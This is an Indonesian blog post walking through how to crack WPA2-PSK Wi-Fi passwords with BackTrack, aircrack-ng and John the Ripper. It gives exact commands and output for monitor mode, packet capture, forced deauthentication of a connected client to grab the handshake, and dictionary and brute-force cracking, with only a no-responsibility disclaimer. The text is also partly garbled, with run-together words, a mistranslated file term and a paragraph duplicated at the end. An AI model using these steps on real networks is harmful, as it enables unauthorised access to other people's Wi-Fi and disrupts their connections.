.

Rabu, 16 Oktober 2013

Cracking WPA2 PSK dengan Backtrack , aircrack-ng dan John The Ripper

Langkah dasar:* Interface dalam mode monitor
* Cari jaringan nirkabel/WIFI (yang dilindungi dengan WPA2 dan Shared Key Pra)
* Menangkap semua paket
* Tunggu sampai Anda melihat seorang klien dan deauthenticate klien, sehingga handshake dapat ditangkap
* Crack password menggunakan dictionary file (atau melalui John The Ripper)
Saya disini menggunakan interface jaringan Dlink DWL-G122 (USB) nirkabel dalam prosedur ini. Dalam backtrack4, perangkat ini tardeteksi  sebagai wlan0.
Pertama,  card interface dalam mode monitor:
root@bt:~# airmon-ng

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)
Ok, kita sekarang dapat menggunakan interface mon0
setelah itu Mari kita cari jaringan nirkabel/wifi yang menggunakan WPA2 / PSK:
root@bt:~# airodump-ng mon0

 CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                    

 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet                                                  

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                            

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet
stop airodump-ng dan jalankan lagi, lalu salin semua paket ke disk:
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

Pada point  ini, Anda memiliki 2 pilihan: menunggu sampai klien terhubung dan terkoneksi, atau deauthenticate klien yang ada dan dengan demikian memaksanya untuk reassociate. Waktu adalah uang, jadi mari kita sedikit memaksa dengan pilihan “ deauthenticate. Kita membutuhkan BSSID dari AP (-a) dan mac dari client yang terhubung (-c)
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

airodump-ng akan menunjukkan "WPA Handshake" di sudut kanan atas
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                

 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet                                              

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230
Stop airodump-ng dan pastikan file yang dibuat dengan benar
root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
Crackingpassword  WPA2PSKdidasarkan padabruteforcing, dan dapatmemakan waktu yang sangatsangat lama. Ada2carabruteforcing: salah satu yangrelatif cepatnamun tidak menjaminkesuksesan dansalah satu yangsangat lambat, namunmenjamin bahwa Andaakan menemukan password  di beberapatitik .
Opsi pertamaadalah denganmenggunakan fileworklist/drstionary. Banyakfile-file inidapat ditemukandi internet(misalnya www.theargon.comatau dipacketstorm ), atau dapatdihasilkandengan alat sepertiJohn TheRipper. Setelahwordlistdibuat, semua yang perlu Andalakukan adalah menjalankanaircrack-ngdenganworklistdanfeed. Topi yangberisiHandshakeWPA2.
Jadi jikawordlistAnda disebutword.lst(under /tmp/wordlists)Anda dapat menjalankan :

aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
 
Kemungkinan anda sudah  mendapatkan password WPA2 PSK  dengan sangat cepat ,namun pada metode Metode kedua (bruteforcing) akan pasti berhasil 99 % namum perlu waktu lama untuk menyelesaikannya, Perlu anda diingat, kunci WPA2 bisa sampai 64 karakter, sehingga dalam teori Anda akan membangun setiap kombinasi password dengan semua set karakter, perintah untuk menggunakan nya :
root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap
 Warning !!! Saya tidak bertanggung jawab atas penyalahgunaan dsb ….
Pada titik ini, Anda memiliki 2 pilihan: baik menunggu sampai klien terhubung dan jabat tangan 4-arah selesai, atau deauthenticate klien yang ada dan dengan demikian memaksanya untuk reassociate. Waktu adalah uang, jadi mari kita memaksa deauthenticate. Kita membutuhkan BSSID dari AP (-a) dan mac dari client yang terhubung (-c)

Tidak ada komentar:

Posting Komentar

free counters